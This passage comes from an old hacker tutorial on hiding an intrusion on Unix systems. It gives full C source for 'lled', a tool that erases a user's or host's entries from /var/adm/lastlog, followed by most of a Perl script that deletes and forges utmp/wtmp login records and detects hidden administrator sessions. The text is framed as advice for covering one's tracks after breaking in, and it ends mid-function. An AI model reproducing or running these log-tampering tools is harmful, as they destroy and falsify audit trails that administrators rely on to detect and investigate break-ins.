  3124. You might also have to clean stuff out of the file /vat/adm/lastlog
  3125.  
  3126. For this use the lled.c.  Compile the program and name it lled.
  3127.  
  3128. Here is a menu from the program when you type ./lled
  3129.  
  3130. [4:04am][/home/paris/compile]lled
  3131. Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
  3132. -h      This help
  3133. -f      Use FILE instead of default
  3134. -a      Show all entries found
  3135. -u      Show all entries for USER
  3136. -b      Show NULL entries
  3137. -e      Erase USER completely
  3138. -c      Erase all connections containing HOST
  3139. -z      Show ZAP'd entries
  3140. -x      Attempt to remove ZAP'd entries completely
  3141.  
  3142. It would be good to try to view first using -u, but many times it will not
  3143. show your username in the lastlog, but it will still have your host, so I
  3144. have found that if you know what to look for you can just type something like:
  3145. If my host name that I was coming from was machine.edit.com, I could type
  3146.  
  3147. lled -e username -c machine.edit
  3148.  
  3149. If you need to view the lastlog your host entry should be at the end of the
  3150. file, just type: lled -a
  3151.  
  3152. chmod the file lastlog.tmp 644 and copy the file over the top of the lastlog
  3153. file in the log directory just like you did above for the wted.
  3154.  
  3155. BE SURE TO SET THE PATH FOR YOUR lastlog below!
  3156.  
  3157. Ok here is your lled.c
  3158. -------------------------- cut here
  3159. #include <stdio.h>
  3160. #include <time.h>
  3161. #include <lastlog.h>
  3162. #include <fcntl.h>
  3163.  
  3164. char *file="/var/adm/lastlog";
  3165.  
  3166. main(argc,argv)
  3167. int argc;
  3168. char *argv[];
  3169. {
  3170. int i;
  3171. if (argc==1) usage();
  3172. for(i=1;i<argc;i++)
  3173.     {
  3174.     if(argv[i][0] == '-')
  3175.         {
  3176.         switch(argv[i][1])
  3177.             {
  3178.             case 'b': printents(""); break;
  3179.             case 'z': printents("Z4p"); break;
  3180.             case 'e': erase(argv[i+1]); break;
  3181.                         case 'c': erase(0,argv[i+1]); break;
  3182.             case 'f': file=argv[i+1]; break;
  3183.             case 'u': printents(argv[i+1]); break;
  3184.             case 'a': printents("*"); break;
  3185.             case 'x': remnull(argv[i+1]); break;
  3186.             default:usage();
  3187.             }
  3188.         }
  3189.     }
  3190. }
  3191.  
  3192. printents(name)
  3193. char *name;
  3194. {
  3195. struct lastlog utmp,*ptr;
  3196. int fp=-1;
  3197. ptr=&utmp;
  3198. if (fp=open(file,O_RDONLY))
  3199.     {
  3200.     while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog))
  3201.         {
  3202.         if ( !(strcmp(name,ptr->ll_line)) || (name=="*") ||
  3203.         (!(strcmp("Z4p",name)) && (ptr->ll_time==0)))
  3204.             printinfo(ptr);
  3205.         }
  3206.     close(fp);
  3207.     }
  3208. }
  3209.  
  3210. printinfo(ptr)
  3211. struct lastlog *ptr;
  3212. {
  3213. char tmpstr[256];
  3214. printf("%s\t",ptr->ll_line);
  3215. strcpy(tmpstr,ctime(&(ptr->ll_time)));
  3216. tmpstr[strlen(tmpstr)-1]='\0';
  3217. printf("%s\t",tmpstr);
  3218. printf("%s\n",ptr->ll_host);
  3219. }
  3220.  
  3221. erase(name,host)
  3222. char *name,*host;
  3223. {
  3224. int fp=-1,fd=-1,tot=0,cnt=0,n=0;
  3225. struct lastlog utmp;
  3226. unsigned char c;
  3227. if (fp=open(file,O_RDONLY)) {
  3228.         fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
  3229.         while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
  3230.                 if (host)
  3231.                         if (strstr(utmp.ll_host,host)) tot++;
  3232.                         else {cnt++;write(fd,&utmp,sizeof(struct lastlog));}
  3233.                 if (name) {
  3234.         if (strcmp(utmp.ll_line,name)) {cnt++;
  3235.             write(fd,&utmp,sizeof(struct lastlog));}
  3236.         else { 
  3237.             if (n>0) {
  3238.                 n--;cnt++;
  3239.                 write(fd,&utmp,sizeof(struct lastlog));}
  3240.             else
  3241.             {
  3242.             printinfo(&utmp);
  3243.             printf("Erase entry (y/n/f(astforward))? ");
  3244.             c='a';
  3245.             while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
  3246.             if (c=='f') {
  3247.                 cnt++;
  3248.                 write(fd,&utmp,sizeof(struct lastlog));
  3249.                 printf("Fast forward how many entries? ");
  3250.                 scanf("%d",&n);}
  3251.             if (c=='n') {
  3252.                 cnt++;
  3253.                 write(fd,&utmp,sizeof(struct lastlog));
  3254.                 }
  3255.             if (c=='y') tot++;
  3256.             } 
  3257.               }    }                    
  3258.         }
  3259.         close(fp);
  3260.         close(fd);
  3261.         }
  3262. printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
  3263. printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
  3264. }
  3265.  
  3266. remnull(name)
  3267. char *name;
  3268. {
  3269. int fp=-1,fd=-1,tot=0,cnt=0,n=0;
  3270. struct lastlog utmp;
  3271. if (fp=open(file,O_RDONLY)) {
  3272.         fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
  3273.         while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
  3274.         if (utmp.ll_time) {
  3275.             cnt++;
  3276.             write(fd,&utmp,sizeof(struct lastlog));
  3277.         }
  3278.         else
  3279.             tot++;
  3280.     }
  3281.         close(fp);
  3282.         close(fd);
  3283.         }
  3284. printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
  3285. printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
  3286. }
  3287.  
  3288. usage()
  3289. {
  3290. printf("Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
  3291. printf("\t-h\tThis help\n");
  3292. printf("\t-f\tUse FILE instead of default\n");
  3293. printf("\t-a\tShow all entries found\n");
  3294. printf("\t-u\tShow all entries for USER\n");
  3295. printf("\t-b\tShow NULL entries\n"); 
  3296. printf("\t-e\tErase USER completely\n");
  3297. printf("\t-c\tErase all connections containing HOST\n");
  3298. printf("\t-z\tShow ZAP'd entries\n");
  3299. printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
  3300. }
  3301. ---------------------------------------------------------------- cut here
  3302.  
  3303. A good perl script for editing utmp, wtmp, and checking processes.
  3304. It will also let you insert lines in wtmp.  So if you need to play you
  3305. can add clinton.whitehouse.gov logging into port ttyp3 and show he stayed
  3306. on the system for a few hours!
  3307.  
  3308. Running 'check' will let you know if someone is on the system and not showing
  3309. up in the utmp log.  Admins like to hide the fact that they are online
  3310. sometimes.  This will allow you to see their connection.  You must be root to
  3311. run the script, and they need perl 5.003+ on thier system.  After starting
  3312. the script just type help.
  3313.  
  3314. Here are some of the basic commands:
  3315.  
  3316. starts by loading wtmp
  3317.  
  3318. delete user username
  3319. delete host hostanme
  3320. write
  3321.  
  3322. read wtmp
  3323. delete user username
  3324. delete host hostname
  3325. write
  3326.  
  3327. do help for the rest ... the best wtmp,wtmp editor around!
  3328.  
  3329. Say thankyou i-e ;)
  3330.  
  3331. -----------------------start of utmpman.pl
  3332. #!/usr/bin/perl -w
  3333. #
  3334. # Variable defines.
  3335. my($utmp_location) = "/var/run/utmp";
  3336. my($wtmp_location) = "/var/log/wtmp";
  3337. my($shells_location) = "/etc/shells";
  3338. my($ttybase) = "tty";
  3339. my($ttyrange) = "pqrs";                 # TTYrange standard on most linux systems.
  3340. my($ttyports) = "012345657689abcfef";   # TTYports standard on most linux systems.
  3341.  
  3342. # Global initializations.
  3343. my($active_file) = "";
  3344. my(%entries) = {};
  3345. my(@cmdline) = ();
  3346. my(@shells) = ();
  3347.  
  3348. # Display banner.
  3349. print "\nutmp Manager v0.8\n\n";
  3350.  
  3351. # Access check.
  3352. die("utmpman :: You must be root to run this application!\n") unless ($> == 0);
  3353.  
  3354. # Read in valid shells.
  3355. if (defined($shells_location)) {
  3356.   open(SHELLFILE, "<$shells_location");
  3357.   @shells = <SHELLFILE>;
  3358.   close(SHELLFILE);
  3359. }
  3360. # Process "basename" of each shell.
  3361. @shells = map( { /([^\/\n]+)\n*$/; $1; } @shells);
  3362.                                  
  3363. print push(@shells) . " valid shells in $shells_location: @shells\n" if (defined(@shells));
  3364. readfile("$utmp_location");
  3365. print("\nutmpman: $active_file> ");
  3366. while (<STDIN>) {
  3367.   process_cmd(split);
  3368.   print("\nutmpman: $active_file> ");
  3369. }
  3370.  
  3371. sub process_cmd {
  3372.   return if (!defined(@_));
  3373.   my(@line) = map { lc($_) } @_;
  3374.   
  3375.   $_ = shift(@line);
  3376.   SWITCH: {
  3377.         /^check$/     && do {
  3378.                            check_func(@line);
  3379.                            last SWITCH;
  3380.                          };
  3381.  
  3382.         /^delete$/    && do {
  3383.                            del_func(@line);
  3384.                            last SWITCH;
  3385.                          };  
  3386.                          
  3387.         /^help$/      && do {
  3388.                            help_func();
  3389.                            last SWITCH;          
  3390.                          };
  3391.                                       
  3392.         /^insert$/    && do {
  3393.                            ins_func(@line);
  3394.                            last SWITCH;
  3395.                          }; 
  3396.                                       
  3397.         /^list$/      && do {
  3398.                            list_func(@line);
  3399.                            last SWITCH;
  3400.                          };
  3401.  
  3402.         /^read$/      && do {
  3403.                            read_func(@line);
  3404.                            last SWITCH;
  3405.                          };
  3406.                                                                                               
  3407.         /^write$/     && do {
  3408.                            write_func(@line);
  3409.                            last SWITCH;
  3410.                          };              
  3411.                                                     
  3412.         /^quit|exit$/ && exit(0);
  3413.         
  3414.         # DEFAULT. 
  3415.         print ("Invalid command.\n");       
  3416.   }
  3417. }
  3418.  
  3419.  
  3420. # HELP
  3421.  
  3422. sub help_func {
  3423.   print << "EOM";
  3424.  
  3425. utmpManager Help
  3426. ----------------
  3427.  
  3428. Note: - <n> is an argument.
  3429.       - [id=] is a token which expects a value as part of command
  3430.         (ie, insert id=p5 user=root 11/23/96). See the insert command.
  3431.       - A line is the full name to the tty port, ie ttyp0.
  3432.       - An id is the *unique* representation of the port
  3433.         (without the tty, etc), ie "p0" (for ttyp0).
  3434.  
  3435.   check
  3436.     - Perform user consistancy check. Use this to make sure that the data in
  3437.       utmp agrees with who is actually on the machine. This is useful in
  3438.       determining if a user is online with hidden ports, running nohup'd
  3439.       processes, or running iScreen.
  3440.  
  3441.   delete <x>-<y>
  3442.     - Delete entries #x to #y.
  3443.  
  3444.   delete host <host>
  3445.     - Delete *all* entries which match the substring <host>.
  3446.  
  3447.   delete line|id <line|id>
  3448.     - Delete entry containing <line> or <id>.
  3449.  
  3450.   insert {id=|line=} [type=] [user=] [host=] [ConnTime] {LogoffTime}
  3451.     - Insert an entry into utmp/wtmp files specifying any combination
  3452.       of id/line, type, username, host, connection time, and logoff time.
  3453.       (LogoffTime only valid for WTMP files.)
  3454.  
  3455.   list host <host>
  3456.     - List all entries matching the substring <host>.
  3457.  
  3458.   list line|id <line|id>
  3459.     - List all entries matching <line> or <id>.
  3460.  
  3461.   read utmp|wtmp|<filename>
  3462.     - Read entries from either default wtmp, default utmp, or an arbitrary
  3463.       filename. Note: arbitrary filenames MUST start with either "utmp" or
  3464.       "wtmp" to be used with this editor. Rename files *outside* of this
  3465.       editor if necessary. If read is executed without any arguments, it
  3466.       rereads the last given filename, which is displayed on the prompt.
  3467.  
  3468.   write {filename}
  3469.     - Write entries to file {filename}. If write is executed without any
  3470.       arguments, then entries will be written to the last given filename,
  3471.       which is displayed on the prompt.
  3472.  
  3473. EOM
  3474. }
  3475.  
  3476. # DELETE
  3477.  
  3478. sub del_func {
  3479.   my(@params) = @_;
  3480.  
  3481.   if (!push(@_)) {
  3482.     print("delete :: Not enough parameters. See \"help\" for syntax.\n");
  3483.     return undef;
  3484.   } elsif ($params[0] =~ /host|user|id|line/) {
  3485.     del_by_data(@_);
  3486.   } elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/) {
  3487.     del_by_range($params[0]);
  3488.   } elsif ($params[0] =~ m/^(\d+)$/) {
  3489.     del_by_range("$1-$1");
  3490.   }
  3491.   
  3492.   # Renumber list after delete operation.
  3493.   resync();
  3494. }
  3495.  
  3496.  
  3497. sub del_by_range {
  3498.   my($range)=shift;
  3499.   $range =~ m/(\d+)*-(\d+)*/;
  3500.   my($lo, $hi, $count)=($1, $2, 0);
  3501.   
  3502.   $lo = 0 if (!defined($lo));
  3503.   $hi = scalar(keys(%entries)) if (!defined($hi));
  3504.   
  3505.   foreach (sort( { $a <=> $b } keys(%entries))) {
  3506.     if (($_ >= $lo) && ($_ <= $hi)) {
  3507.       delete($entries{$_});
  3508.       $count++;
  3509.     }
  3510.   }
  3511.   print "$count entries deleted.\n";
  3512. }               
  3513.  
  3514.  
  3515. sub del_by_data {
  3516.   my($op, $data) = @_;
  3517.   my($count) = 0;
  3518.  
  3519.   if ((length($data) < 5) && ($op eq "host")) {
  3520.     print "Must specify at least 5 characters for delete hostmask.\n";
  3521.     return undef;
  3522.   } elsif (((length($data) > 4) && ($op eq "id"))||
  3523.            ((length($data) > 11) && ($op eq "line"))) {
  3524.     print "Invalid $op specified.\n";
  3525.     return undef;
  3526.   }
  3527.   # Note: If we are deleting by user, then user must match, *exactly*!
  3528.   $data = "^" . pack("a8", $data) . "\$" if ($op eq "user");
  3529.   foreach (sort( { $a <=> $b } keys(%entries))) {
  3530.     if (%{$entries{$_}}->{$op} =~ m/$data/i) {
  3531.       delete($entries{$_});
  3532.       ++$count;
  3533.     }
  3534.   }
  3535.   if (!$count) {
  3536.     print "No $op entries matching $data.\n";
  3537.   } else {
  3538.     print "$count entries deleted.\n";
  3539.   }
  3540. }
  3541.  
  3542.  
  3543. # INSERT
  3544.  
  3545. # Date1 Time1 = DateTime1 => mm/dd/[cc]yy[:hh:mm[:ss]]
  3546. # Date2 Time2 = DateTime2 => (see above)
  3547. # user=<username>
  3548. # host=<hostname>
  3549. # id=<id> | line=<line>
  3550. #
  3551. # utmp:
  3552. # insert {id=|line=} [type=] [user=] [host=] [DateTime]
  3553. # wtmp:
  3554. # insert {id=|line=} [user=] [host=] [DateTime1] {DateTime2}
  3555.  
  3556. sub ins_func {
  3557.   my(%cmdopt)={};
  3558.   my($datetime1, $datetime2, $gmdate, $gmdate2);
  3559.  
  3560.   # Get random pid out of the way.
  3561.   $cmdopt{"pid"} = int(rand(32656)+100);
  3562.   $cmdopt{"addr"} = pack("a4", "");
  3563.  
  3564.   # Get command options.
  3565.   foreach (@_) {
  3566.     if (/=/) {
  3567.       local($key, $value)=split(/=/);
  3568.       $cmdopt{$key} = $value;
  3569.     } else {
  3570.       if (!defined($datetime1)) {
  3571.         $datetime1 = $_;
  3572.         next;
  3573.       }
  3574.       if (!defined($datetime2)) {
  3575.         $datetime2 = $_ ;
  3576.         next;
  3577.       }
  3578.       print "insert :: Invalid options specified. Please see \"help\" for syntax.\n";
  3579.       return undef;
  3580.     }
  3581.   }
  3582.  
  3583.   # Check for an illegal pair or illegal option.
  3584.   foreach (keys(%cmdopt)) {
  3585.     if (!(/^host|id|line|type|user|addr$/)) {
  3586.       print "insert :: Invalid options specified. Please see \"help\" for syntax.\n";
  3587.       return undef;
  3588.     }
  3589.     if (($_ eq "last") && ($active_file !~  m!/*utmp[^/]*$!i)) {
  3590.       print "insert :: LAST option only valid for utmp files.\n";
  3591.       return undef;
  3592.     }     
  3593.   }
  3594.  
  3595.   # Get date in seconds since 1970.
  3596.   $gmdate = SecsSince1970($datetime1);
  3597.  
  3598.   # Get ending date in seconds since 1970.
  3599.   $gmdate2 = SecsSince1970($datetime2) if (defined($datetime2));
  3600.  
  3601.   if (!defined($gmdate) || (!defined($gmdate2) && defined($datetime2))) {
  3602.     print "insert :: Invalid date specified.\n";
  3603.     return undef;
  3604.   }
  3605.  
  3606.   if (defined($gmdate2)) {
  3607.     if ($gmdate2 < $gmdate) {
  3608.       print "insert :: First date/time must be *later* than second date/time.\n";
  3609.       return undef;
  3610.     }
  3611.   }
  3612.  
  3613.   if (defined($cmdopt{"id"}) && defined($cmdopt{"line"})) {
  3614.     print "insert :: Insert by LINE or ID only. Please do not specify both.\n";
  3615.     return undef;
  3616.   }
  3617.  
  3618.   my($op);
  3619.  
  3620.   if (!defined($cmdopt{"id"})) {
  3621.     $cmdopt{"id"} = $cmdopt{"line"};
  3622.     $op = "line";
  3623.     if (!($cmdopt{"id"} =~ s/^$ttybase//)) { 
  3624.       print "insert :: Invalid line specified.\n"; 
  3625.       return undef; 
  3626.     }
  3627.   } else {
  3628.     $cmdopt{"line"} = $ttybase . $cmdopt{"id"};
  3629.     $op = "id";
  3630.   } 
  3631.  
  3632.   if (!(defined($cmdopt{"line"}) || defined($cmdopt{"id"}))) {
  3633.     print "insert :: Neither LINE nor ID value found. See \"help\" for syntax.\n";
  3634.     return undef;
  3635.   }
  3636.     
  3637.   my($searchdata) = ($active_file =~ m!/*utmp[^/]*$!i) ?  
  3638.     (pack(($op eq "line") ? "a12" : "a4", $cmdopt{$op})):$cmdopt{$op};
  3639.   my($epos1, $npos1, $epos2, $npos2) = ();
  3640.   my($oldpos, $count)=("", 0);
  3641.  
  3642.   foreach (sort( { $a <=> $b } keys(%entries))) {
  3643.     if ($active_file =~ m!/*utmp[^/]*$!i) {
  3644.       # Handle utmp insertion by line insertion.
  3645.       if (%{$entries{$_}}->{$op} eq $searchdata) {
  3646.         printf ("insert :: $op $searchdata already exists at position $_\n");
  3647.         # This needs to check every option in %cmdopt for defined or null.
  3648.         $count = 0;
  3649.         foreach (qw(user host time)) {
  3650.           if (defined($cmdopt{$_})) {
  3651.             $count++ if ($cmdopt{$_} ne "");
  3652.           }
  3653.         }
  3654.         if (!$count) {
  3655.           printf ("insert :: No other data specified. Entry unchanged.\n");
  3656.           return undef;
  3657.         }
  3658.         last;
  3659.       }
  3660.     } else {
  3661.       # Handle wtmp insertion by time position. (Messy)
  3662.       $epos1 = $oldpos if (defined($npos1) && !defined($epos1));
  3663.       $npos1 = $_ if (%{$entries{$_}}->{"time"} > $gmdate);
  3664.       last if (!defined($gmdate2) && defined($epos1));
  3665.       $epos2 = $oldpos if (defined($npos2)); 
  3666.       $npos2 = $_ if (%{$entries{$_}}->{"time"} > $gmtime2);
  3667.       last if (defined($epos2));
  3668.     }
  3669.     $oldpos = $_;
  3670.   }
  3671.  
  3672.   # Set any unspecified defaults.
  3673.   $cmdopt{"user"} = pack("a8", "")  if !defined($cmdopt{"user"});
  3674.   $cmdopt{"host"} = pack("a16", "") if !defined($cmdopt{"host"});
  3675.   $cmdopt{"type"} = 7               if !defined($cmdopt{"type"});
  3676.  
  3677.   # Determine end of list insertion positions. (IE, dates entered are after
  3678.   # dates in wtmp file or line/id not found in utmp file.
  3679.   $epos1 = (scalar(keys(%entries)) + 1) if (!defined($npos1));
  3680.   if (defined($datetime2)) {
  3681.     $epos2 = (scalar(keys(%entries)) + 1) if (!defined($npos2));
  3682.     ++$epos2 if (defined($gmtime2) && !defined($npos1));
  3683.   }
  3684.  
  3685.   # Parse insert data and insert entry.
  3686.   $epos1 = sprintf("%7.3f", ($npos1 - $epos1)/2) if (defined($npos1));
  3687.   $epos2 = sprintf("%7.3f", ($npos2 - $epos2)/2)
  3688.     if (defined($npos2) && defined($gmdate2));
  3689.  
  3690.   # Insert first entry.
  3691.   $cmdopt{"time"} = $gmdate;  
  3692.   @{$entries{$epos1}}{qw(type pid line id time user host addr)} = 
  3693.            @{%cmdopt}{qw(type pid line id time user host addr)};
  3694.  
  3695.   if (defined($epos2)) {
  3696.     $cmdopt{"user"} = pack("a8", "");
  3697.     $cmdopt{"host"} = pack("a16","");
  3698.     $cmdopt{"id"}   = pack("a4", "");
  3699.     $cmdopt{"time"} = $gmdate2;
  3700.  
  3701.     @{$entries{$epos2}}{qw(type pid line id time user host addr)} =
  3702.              @{%cmdopt}{qw(type pid line id time user host addr)};
  3703.   }
  3704.  
  3705.   resync();
  3706. }
  3707.  
  3708.  
  3709. # LIST
  3710.  
  3711. sub list_func {
  3712.   my(@params) = @_;
  3713.  
  3714.   if (!push(@_) || ($params[0] eq "all")) {
  3715.     list_by_range("-");
  3716.     return 0;
  3717.   } elsif ($params[0] =~ /^host|user|id|line$/) {
  3718.     list_by_data(@_);
  3719.     return 0;
  3720.   } elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/) {
  3721.     list_by_range($params[0]);
  3722.     return 0;
  3723.   } elsif ($params[0] =~ m/^(\d+)$/) {
  3724.     list_by_range("$1-$1");
  3725.     return 0;
  3726.   }
  3727.                           
  3728.   print ("list :: Error in parameters. See \"help\" for syntax.\n");
  3729.   return undef;
  3730. }    
  3731.  
  3732.  
  3733. sub list_by_data {
  3734.   my($op, $data) = @_;
  3735.   my($count) = 0;
  3736.  
  3737.   foreach (sort( {$a <=> $b} keys(%entries))) {
  3738.     if (%{$entries{$_}}->{$op} =~ m/$data/i) {
  3739.       list_entry($_);
  3740.       ++$count;
  3741.     }
  3742.   }
  3743.   print "No $op entries matching $data.\n" if (!$count);
  3744. }
  3745.  
  3746.  
  3747. sub list_by_range {
  3748.   my($range)=shift;
  3749.   $range =~ m/(\d+)*-(\d+)*/;
  3750.   my($lo, $hi)=($1, $2);
  3751.   
  3752.   $lo = 0 if (!defined($lo));
  3753.   $hi = scalar(keys(%entries)) if (!defined($hi));
  3754.   
  3755.   foreach (sort( { $a <=> $b } keys(%entries))) {
  3756.     if (($_ >= $lo) && ($_ <= $hi)) {
  3757.       list_entry($_);
  3758.     }
  3759.   }
  3760. }               
  3761.  
  3762.  
  3763. sub list_entry {
  3764.   printf("#%3d - " . gmtime(%{$entries{$_}}->{"time"}), $_);
  3765.   printf("  %s/%s", @{$entries{$_}}{qw(id line)});
  3766.   printf(": %s ", %{$entries{$_}}->{"user"})
  3767.     if (%{$entries{$_}}->{"user"} ne pack("a8", ""));
  3768.   printf("from %s", %{$entries{$_}}->{"host"}) 
  3769.     if (%{$entries{$_}}->{"host"} ne pack("a16", ""));
  3770.   if (%{$entries{$_}}->{"addr"} ne "\0\0\0\0") {
  3771.     printf(" (%s)", longtodot4(%{$entries{$_}}->{"addr"}));
  3772.   }
  3773.   print ("\n");
  3774.   printf("%7sPID = %u\n", "", %{$entries{$_}}->{"pid"}) 
  3775.     if (%{$entries{$_}}->{"pid"} && (%{$entries{$_}}->{"user"} ne pack("a8","")));
  3776. }
  3777.  
  3778. # <Silmaril> printf "#$_ - %s %s/%s: %s from %s\n", @{$v}->{qw(time id line user host)};
  3779. # <Silmaril> now *that's* cool :-)
  3780. # <Silmaril> should be like this: @{$v}{qw(time id line user host)}
  3781. # <Silmaril> I had an extra -> in my first version.
  3782. #
  3783. # Or course, it's changed since then, but - "Thanks, Sil!" :)
  3784. #
  3785.  
  3786.  
  3787. # READ
  3788.  
  3789.  
  3790. sub read_func {
  3791.   my($arg)=shift;
  3792.   
  3793.   $arg = $utmp_location if ($arg eq "utmp");
  3794.   $arg = $wtmp_location if ($arg eq "wtmp");
  3795.   $arg = $active_file if (!defined($arg));
  3796.   
  3797.   if ($arg !~ m!/*[uw]tmp[^/]*$!) {
  3798.     print("read :: Filenames *must* start with either 'wtmp' or 'utmp' to be edited.\n");
  3799.     return undef;
  3800.   }
  3801.   
  3802.   readfile($arg);
  3803. }
  3804.    
  3805.  
  3806. # WRITE
  3807.  
  3808. sub write_func {
  3809.   my($file)=shift;
  3810.   my($count)=0;
  3811.   
  3812.   $file = $active_file if (!defined($file));
  3813.   if ($file !~ m!/*[uw]tmp[^/]*$!) {
  3814.     print ("write :: File must start with 'utmp' or 'wtmp'.\nRename file outside this program.\n");
  3815.     return undef;
  3816.   }
  3817.   if (!open(OUTFILE, ">$file")) {
  3818.     print ("write :: Can't open $file for output.\n");
  3819.     return undef;
  3820.   }
  3821.   binmode(OUTFILE);
  3822.   
  3823.   foreach (sort( { $a <=> $b } keys(%entries))) {
  3824.     printf OUTFILE ("%s", pack("i L a12 a4 L a8 a16 a4", 
  3825.       @{$entries{$_}}{qw(type pid line id time user host addr)}));
  3826.     $count++;
  3827.   }
  3828.   print ("$active_file: " . scalar(keys(%entries)) . " entries written.\n");
  3829.   close(OUTFILE);
  3830. }               
  3831.  
  3832.  
  3833. # CHECK
  3834.  
  3835. sub check_func {
  3836.   if (push(@_)) {
  3837.     print "check :: Invalid options specified. Please see \"help\"\n";
  3838.     return undef;
  3839.   }
  3840.   if ($active_file !~ m!/*utmp[^/]*$!) {
  3841.     print "check :: Command can only be run on utmp files.\n";
  3842.     return undef;
  3843.   }
  3844.   
  3845.   # Build struct of ports containing port name, device num and owner.
  3846.   # Note: Test run in grepstr may *not* be portable for all Unix
  3847.   #       types. Be forewarned! This was designed for Linux.
  3848.   # Hint: For all intents and purposes, s/^$ttybase([$ttyrange][$ttyports])$/
  3849.   #       should return the same as what you expect in "struct utmp->ut_id".
  3850.   my($grepstr) = "^($ttybase\[$ttyrange\]\[$ttyports\])\$";
  3851.   my(%ports) = {};
  3852.   my($user, $rdev) = ();
  3853.  
  3854.   opendir(DEVDIR, "/dev");
  3855.   my(@devfiles) = readdir(DEVDIR);
  3856.   @devfiles = grep(/$grepstr/, @devfiles);  
  3857.   close(DEVDIR);
  3858.   foreach (@devfiles) {
  3859.     /^$ttybase([$ttyrange][$ttyports])$/;
  3860.     if (!defined($1)) {
  3861.       print "check :: Warning! Could not extract port ID from $_.\n";
  3862.     } else {
  3863.       ($user, $rdev) = (stat("/dev/$_"))[4, 6];
  3864.       $user = getpwuid($user);
  3865.       $ports{$1} = newport($_, $rdev, $user);
  3866.     } 
  3867.   }
  3868.   
  3869.   # Check ownership of /dev ports.
  3870.   my(@logdev)=();
  3871.   foreach (sort(keys(%ports))) {
  3872.     push(@logdev, $_) if (%{$ports{$_}}->{"owner"} ne "root");
  3873.   }
  3874.   @logdev = sort(@logdev);
  3875.       
  3876.   # Check utmp (against ports detected as logged in);
  3877.   my(@logutmp)=();
  3878.   foreach (sort( { $a <=> $b } keys(%entries))) {
  3879.     if (defined(%{$entries{$_}}->{"user"}) && defined(%{$entries{$_}}->{"host"}) &&
  3880.         defined(%{$entries{$_}}->{"id"})   && defined(%{$entries{$_}}->{"pid"})) {
  3881.       push(@logutmp, %{$entries{$_}}->{"id"})  
  3882.         if ((%{$entries{$_}}->{"id"} =~ /[$ttyrange][$ttyports]/) &&
  3883.             ((%{$entries{$_}}->{"user"} ne pack("a8", "")) ||
  3884.             ((%{$entries{$_}}->{"host"} ne pack("a16", "")) &&
  3885.              (%{$entries{$_}}->{"id"} ne pack("a4", "")) &&
  3886.              (%{$entries{$_}}->{"line"} ne pack("a12", "")) &&
  3887.              (%{$entries{$_}}->{"pid"} > 0))));
  3888.     }
  3889.   }
  3890.   @logutmp = sort(@logutmp);
  3891.  
  3892.   # Check PIDs (find processes with active port ids)
  3893.   opendir(PIDDIR, "/proc");
  3894.   my(%processes) = {};
  3895.   my(@portprocesses) = ();
  3896.   foreach (grep(/\d+/, readdir(PIDDIR))) {
  3897.     local($procdata, $cmdline);
  3898.     open(PROCFILE, "</proc/$_/stat");
  3899.     $procdata = <PROCFILE>;
  3900.     close(PROCFILE);
  3901.     if (-e "/proc/$_/stat") {
  3902.       local($cmdline, $devnum, $portid);
  3903.       ($cmd, $devnum) = (split(/ /, $procdata))[1, 6];
  3904.       # Remove surrouding () from command name.
  3905.       $cmd =~ s/[\(\)]//g;
  3906.       $portid = dev2id(\%ports, $devnum);
  3907.       if (defined($portid)) {
  3908.         push(@portprocesses, $portid)
  3909.           if (!defined(listpos(\@portprocesses, $portid))&&($$ != $_));
  3910.         $processes{$_} = newproc($cmd, $portid) if (defined($portid) && ($$ != $_));
  3911.       }
  3912.     }
  3913.   }
  3914.   close(PIDDIR);
  3915.  
  3916.   # A port is *not* logged in if there is no dev entry for port, no utmp entry
  3917.   # and no active processes.
  3918.   my(@validshellports) = ();
  3919.   foreach (sort( { $a <=> $b} keys(%processes))) {
  3920.     push(@validshellports, %{$processes{$_}}->{"port"}) 
  3921.       if (defined(listpos(\@shells, %{$processes{$_}}->{"cmd"}))&&
  3922.           !defined(listpos(\@validshellports, %{$processes{$_}}->{"port"})));
  3923.   }
  3924.   # Remove ports with valid shells from list of ports with active processes.
  3925.   my(@noshellports) = 
  3926.     sort(grep(!defined(listpos(\@validshellports, $_)), @portprocesses));
  3927.   @validshellports = sort(@validshellports);
  3928.   print "Ports with active /dev files: @logdev\n"
  3929.     if (defined(@logdev));
  3930.   print "Ports with utmp entries: @logutmp\n"
  3931.     if (defined(@logutmp));
  3932.   print "Ports with valid shells: @validshellports\n" 
  3933.     if (defined(@validshellports));
  3934.   print "Ports with active processes and *no* shells: @noshellports\n" 
  3935.     if (defined(@noshellports));
  3936. }  
  3937.   
  3938.     
  3939. # GENERAL
  3940.  
  3941. sub readfile {
  3942.   local($file);
  3943.   $file = shift;
  3944.   my($index)=1;
  3945.   my($buffer)="";
  3946.  
  3947.   # Insure we have a clean hash table before we start reading in the file.
  3948.   foreach (keys(%entries)) {
  3949.     undef(%{$entries{$_}});
  3950.     delete(${entries{$_}});
  3951.   }
  3952.     
  3953.   open(UTMPFILE, "<$file") || die("utmp-parse: Can't open $file - $!\n");
  3954.   binmode(UTMPFILE);
  3955.   # 1/17/96, struct utmp is 56 bytes (54 according to addition! :P).  
  3956.   while (read(UTMPFILE, $buffer, 56)) {
  3957.     $entries{$index++} = newutmp($buffer);
  3958.   }
  3959.   $active_file = $file;
  3960.   print ("$active_file: " . scalar(keys(%entries)) . " entries loaded.\n");
  3961.   close(UTMPFILE);
  3962. }
  3963.  
  3964.  
  3965. sub newutmp {
  3966.   my($newbuff) = shift;
  3967.   my($longaddr) = 0;
  3968.   
  3969.   $newnode = bless { 
  3970.     "type" => undef, "pid" => undef,  "line" => undef, "id"   => undef,
  3971.     "time" => undef, "user" => undef, "host" => undef, "addr" => undef
  3972.   }, 'UTMPNODE';
  3973.   
  3974.   @{$newnode}{qw(type pid line id time user host addr)}=
